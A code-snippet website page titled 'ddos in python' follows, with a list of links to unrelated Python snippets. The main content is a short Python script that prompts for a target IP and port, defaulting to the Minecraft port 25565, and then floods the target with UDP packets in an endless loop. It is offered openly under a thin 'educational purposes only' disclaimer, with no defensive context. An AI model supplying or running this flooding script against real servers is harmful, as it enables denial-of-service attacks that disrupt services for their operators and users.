Search
 
SCRIPT & CODE EXAMPLE
 

PYTHON

ddos in python

import socket
   
print("Warning!!!! This Script is no joke and it is for educational purposes only, I'm not responsible for any damage caused by this script")
print("To insert the default port write 0")
ip = input('IP >> ')
port = int(input('Port (Default: 25565) >> '))

if port == 0:
      port = 25565

while True:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
   s.connect((ip, port))
   i = 0
   if i < 10:
      s.send(b'x01')


Comment

python ddos

Wait, why?
Comment

PREVIOUS NEXT
Code Example
Python :: python generate id 
Python :: get first x characters of string python 
Python :: select certain element from ndarray python 
Python :: append record in csv 
Python :: find closest color python 
Python :: python3 send mail 
Python :: pandas dataframe column names 
Python :: remove all integers from list python 
Python :: python [remote rejected] master - master (pre-receive hook declined) 
Python :: python get directory of current script file 
Python :: python insert 
Python :: get table selenium python pandas 
Python :: open file python 
Python :: python not jump next line 
Python :: How to get the value of an Entry widget in Tkinter? 
Python :: frequency spectrum signal python 
Python :: lambda function with if elif else python 
Python :: smtplib not sending email 
Python :: python 2d array to dataframe 
Python :: python mp4 to mp3 
Python :: count values in numpy list python 
Python :: Filter pandas DataFrame by substring criteria 
Python :: with open python 
Python :: string split in pandas 
Python :: how to find total no of nan values in pandas 
Python :: python for else 
Python :: accessing index of dataframe python 
Python :: how to find the number of times a number appears in python 
Python :: read page source from text file python 
Python :: flask validate method 
ADD CONTENT
Topic
Content
Source link
Name
3+4 =